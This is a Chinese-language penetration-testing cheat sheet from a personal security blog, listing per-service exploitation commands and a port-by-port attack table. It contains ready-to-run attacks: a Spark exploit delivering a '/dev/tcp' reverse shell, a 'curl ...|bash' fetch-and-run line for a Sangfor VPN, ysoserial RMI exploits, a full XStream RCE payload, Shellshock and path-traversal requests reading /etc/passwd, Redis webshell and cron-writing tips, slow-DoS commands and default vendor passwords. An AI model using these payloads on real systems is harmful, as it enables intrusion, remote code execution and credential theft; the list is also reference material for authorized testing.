Vorder's blog

检测点备忘录

主机检测点索引 端口渗透tips
字数统计: 1.8k阅读时长: 10 min
2019/12/16 Share

由于之前知识索引文章记录的太长了,大多数也是新知识点的建立,绕过方式的记录。
所以新开一篇文章,来记录平时主机层面的检测点及检测方法

测试点/方法速查:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
#opsnssl rc4 检测
openssl s_client -connect xxx -cipher RC4
nmap --script ssl-enum-ciphers -p  xx xxx

# slow dos检测
slowhttptest -c 1000 -X -g -o -slow_read_stats -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u http://www.loveuv.net -p 3

#nfs 检测 111
rpcinfo 确定端口开放
showmount -e xx.xx.xx.xx
先apt-get install nfs-common
https://www.freebuf.com/articles/network/159468.html

# Oracle TNS Listener Remote Poisoning  检测
msf里tnspoison_checker模块

#ajp13 tomcat 8009上的ajp协议
https://github.com/limkokhole/CVE-2011-3192 #dos攻击,慎测

# java_rmi 
CVE-2019-12409
java -cp ysoserial-0.0.3-all.jar ysoserial.exploit.RMIRegistryExploit xx.xx.xx.xx 1099  CommonsCollections1 "ping xxxxx.dnslog.cn"

# zookeeper未授权访问
echo envi|nc xx.xx.xx 2181 

# Dns域传送
nmap --script dns-zone-transfer.nse --script-args "dns-zone-transfer.domain=xxxxx.com" -Pn -p 53 1.1.1.1

# redis
redis-cli -h xx.xx.xx.xx -p xx
info

主从复制https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
1.当Redis 权限满足写文件时
	linux 写计划任务, windows写启动目录, 如果可以都写web目录的webshell
2.当Redis 权限不满足写文件时
	发现Redis记录中存在JSON串的时候, 可以尝试写入Fastjson或Jackson的反序列化漏洞
	发现Redis记录中存在AC ED这种反序列化特征的时候, 可以尝试写入ysoserial产生的序列化数据

# zebra 2601、2604
telnet  xxx 2601
默认密码zebra
en 切换特权模式
show ip ospf route 显示路由

# rexec 514 
hydra-gtk 进行爆破

# ms15-034 
curl -k http://[host:port]/ -H "Host: [host:port]" -H "Range: bytes=0-18446744073709551615"|grep "Requested Range Not Satisfiable"

# spark 6066 8080 7077 8081
https://github.com/aRe00t/rce-over-spark.git
./submit.sh xxxxx:6066 2.3.0 https://github.com/aRe00t/rce-over-spark/raw/master/Exploit.jar "bash -i >& /dev/tcp/[vps]/2333 0>&1"
msf里的spark_unauth_rce

# amqp  5672
https://xz.aliyun.com/t/36
https://github.com/m3ssap0/spring-break_cve-2017-8046

# finger 79
msf里finger_users模块,或finger -ls @xx.xx.xx.xx
finger @xx.xx.xx.xx 是否有用户已登录

# supervisor 9001
CVE-2017-11610
https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html

# tomcat
Apache Tomcat       < 6.0.18 'utf8' Directory Traversal  cve-2008-2938(条件context.xml or server.xml allows 'allowLinking'and 'URIencoding)
					<6.0.19 xss /examples/jsp/cal/cal2.jsp?time=" accesskey=x onclick=alert(1)
					/jsp-examples/cal/cal2.jsp?time=" accesskey=x onclick=alert(1)
【manger+version<7】  /manger/html 爆破
【PUT】 curl -X PUT http://xxxxxxx:port/test.jsp/ -d @- < test.jsp
<% out.write("<html><body><h3>[+] hello</h3></body></html>"); %>
CVE-2016-8735       java -cp .\ysoserial.jar ysoserial.exploit.RMIRegistryExploit xx.xx.xx.xx 10001 Groovy1 "cmd.exe /c curl xxxxx:2333"
CVE-2019-0232        curl -k "http://localhost:8080/cgi-bin/hello.bat?&C%3A%5CWindows%5CSystem32%5Cnet.exe+user"  # windows、启用CGIServlet和enableCmdLineArguments(默认不启用)

# apche 
curl "http://localhost/jkstatus;"

cve-2019-0211 # <2.4.17可以提权到root

# hp ILO4 
CVE-2017-12542      msf中admin/hp/hp_ilo_create_admin_account    https://www.freebuf.com/vuls/167124.html
更多利用:https://github.com/airbus-seclab/ilo4_toolbox

# vnc
msf中的scanner/vnc/vnc_none_auth
vncviewer xx.xx.xx.xx 进行连接

#activemq
- cve-2016-3088
- CVE-2019-17571
	java -jar ysoserial-master.jar CommonsCollections5 "curl http://127.0.0.1/ssrf/ssrf.php?rand=log4j" > log4j.curl.bin  
	nc 127.0.0.1 4560 < log4j.curl.bin

#iis 80
msf上的windows/iis/iis_webdav_scstoragepathfromurl(需开启webdav服务的win2003)
PUT写入漏洞

#smtp 25
smtp伪造,也可以使用swaks
nc xxxxx.com 25
EHLO qq.com
MAIL FROM:admin@qq.com
RCPT TO:test@test.com
DATA
"内容"
.
QUIT

# mysql
< 5.5.24 
mysql_authbypass_hashdump

# FreeSWITCH
1.6.10 - 1.10.1
multi/misc/freeswitch_event_socket_cmd_exec

# Gemalto Sentinel License Manager  或者叫HASP LM
目录穿越 http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt

#GlassFish 
目录穿越
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/domains/domain1/config

# bash破壳漏洞
curl -A "() { foo;};echo;/bin/cat /etc/passwd" http://**.**.**.**/cgi-bin/test-cgi

# rtmp
vlc-网络串流-rtmp://ip:port/短地址/串流码 

xx/admin/?c=session&a=index
密码重置(mu/d.u直播

# HP System Management Homepage/hp smh 
hp_sys_mgmt 

# rexec
rlogin -l root  xx.xx.xx.xx 
scanner/rservices/rlogin_login
scanner/rservices/rexec_login

# solr
CVE-2019-12409
cVE-2019-0193

# spring
利用合集https://misakikata.github.io/2020/04/Spring-%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88/

# spring Cloud 

/foo/default/master/..%252F..%252F..%252F..%252Fetc%252fpasswd 
/foo/default/master/..(_)..(_)..(_)..(_)..(_)1.txt

# harbor

默认密码:Harbor12345 
CVE-2019-16097

#thinkphp
rce THINKPHP 5.0.x-5.0.23


# ueditor
.net  1.4.3.3 和 1.5.0 getshell
POST /ueditor/net/controller.ashx?action=catchimage

source%5B%5D=http%3A%2F%2Fx.x.x.x/1.gif?.aspx

#fastjson
https://paper.seebug.org/1192/#fastjson_3
{"@type":"java.net.Inet4Address", "val":"http://xxxx.dnslog.cn"}
Set[{"@type":"java.net.URL", "val":"http://xxxx.dnslog.cn"}}

{"name":"S", "age":21}
{"name":"S", "age":21,"agsbdkjada__ss_d":123}
fastjson不会报错
jackson报错

dos检测
eyJhIjoiXHgaGiJ9 (参数base64解码)

#shiro
反序列化 shiro-550
字节翻转攻击 721  需要登录后获取到合法remeberme
权限绕过cve-2020-1957 ,  /xxxx/..;/admin/index

# xpose+xserver
https://xz.aliyun.com/t/7669

# Xstream 
POST request
<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="java.lang.ProcessBuilder">
              <command>
                <string>ping</string>
        <string>xxx.dnslog.cn</string>
              </command>
              <redirectErrorStream>false</redirectErrorStream>
            </delegate>
            <owner class="java.lang.ProcessBuilder" reference="../delegate"/>
            <resolveStrategy>0</resolveStrategy>
            <directive>0</directive>
            <parameterTypes/>
            <maximumNumberOfParameters>0</maximumNumberOfParameters>
            <method>start</method>
          </org.codehaus.groovy.runtime.MethodClosure>
        </entry>
      </expandoProperties>
    </groovy.util.Expando>
    <int>123</int>
  </entry>
</map>

# 泛微
https://www.cnblogs.com/AtesetEnginner/p/11558469.html

# 深信服vpn

admin/123456/Sangfor/Sangfor@123
wget -t xxx.dnslog.cn -T 5 --spider 1 |curl http://xxx/a|bash

# Fortigate vpn
https://github.com/milo2012/CVE-2018-13379
https://github.com/milo2012/CVE-2018-13382

# Pulse Secure SSL VPN
任意文件读取 https://github.com/projectzeroindia/CVE-2019-11510
授权后命令注入 https://github.com/0xDezzy/CVE-2019-11539

# Exchange
https://github.com/Ridter/Exchange2domain
https://github.com/Ridter/cve-2020-0688
https://xz.aliyun.com/t/7299

#Confluence  
rce CVE-2019-3396,https://github.com/jas502n/CVE-2019-3396

#Ghostscript 图形上传返回缩略图

https://github.com/vulhub/vulhub/tree/master/ghostscript/CVE-2019-6116

# 海康威视
http://ip/System/configurationFile?auth=YWRtaW46MTEK
decode https://github.com/WormChickenWizard/hikvision-xor-decrypter

端口渗透速查:

端口 服务 测试方法
22 ssh CVE-2018-15473
23 telnet telnet xx.xx.xx.xx [port]
25 SMTP awks smtp伪造
42 wins ms11-035(dos漏洞)
53 dns nmap –script dns-zone-transfer.nse –script-args “dns-zone-transfer.domain=xxxxx.com” -Pn -p 53 1.1.1.1
79 finger msf里finger_users模块,或finger -ls @xx.xx.xx.xx
85 深信服
110 pop3
111,1025 nfs showmount -e xx.xx.xx.xx
389 ladp 注入,未授权
443 ssl nmap –script ssl-enum-ciphers -p xx xxx
445 smb ms17010(Vista-win10)
512,513,514 rexec hydra-gtk 进行爆破
1098,1099,1090 rmi 命令执行,nmap -p1099 -sV –script=rmi*
1521 oracle msf里tnspoison_checker模块
2181 zookeeper echo envi 丨nc xx.xx.xx 2181
2323 uep /config/CorrectConfigPwd.sh
2381 hp sys mgmt msf里exploit/multi/http/hp_sys_mgmt_exec
1621 思科移动服务引擎 CVE-2013-3469
2601,2604 zebra telnet xxx 2601 、默认密码zebra
3128 squid squidclient -h xx.xx.xx.xx -p 80 mgr:info
3389 rdp cve-2019-0708,esteemaudit,ms12_020,shift 放大镜 输入法绕过 guest用户
5672 amqp CVE-2017-8045
5900 vnc msf中的scanner/vnc/vnc_none_auth,CVE-2006-2369:admin/vnc/realvnc_41_bypass
5984 CouchDB 弱口令
6066,7077 spark msf里spark_unauth_rce
6379 redis redis-cli -h xx.xx.xx.xx -p xx,主从复制
7001 weblogic weblogicScan,t3漏洞
8161 activmq cve-2016-3088,cve-2015-5254
8291 winbox CVE-2018-14847:https://github.com/BasuCert/WinboxPoC
8088 hadoop YARN ResourceManager,msf里hadoop_unauth_exec
8091 Confluence rce CVE-2019-3396
9001 supervisor CVE-2017-11610
9090 jboss
9095 huawei 华为操作维护系统
9200 Elasticsearch 未授权,rce
10001 tomcat服务 tomcat CVE-2016-8735
11211 Memcached 未授权
27017 MongoDB 弱口令
50070 hadoop 未授权
61616 activemq端口 CVE-2015-5254 反序列化

原文作者:Vorder

原文链接:http://Vorders.me/2019/12/16/检测点备忘录/

发表日期:December 16th 2019, 2:01:19 pm

更新日期:May 15th 2020, 4:54:28 pm

版权声明:本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

CATALOG
  1. 1. 测试点/方法速查:
  2. 2. 端口渗透速查:
Total : 11
2020
2019
2018
CVE-2017-7921 漏洞利用 vulub 合约 ELK sem-cms 漏洞挖掘 信息搜集 知识积累 主机检测点索引 端口渗透tips hw 以太坊 contract 智能合约 合约安全 索引 bypass cors xss bypass upload file webshell bypass md5文件伪造 flask session 命令执行bypass 反序列化 sqli bypass shellcode bypass configurationFile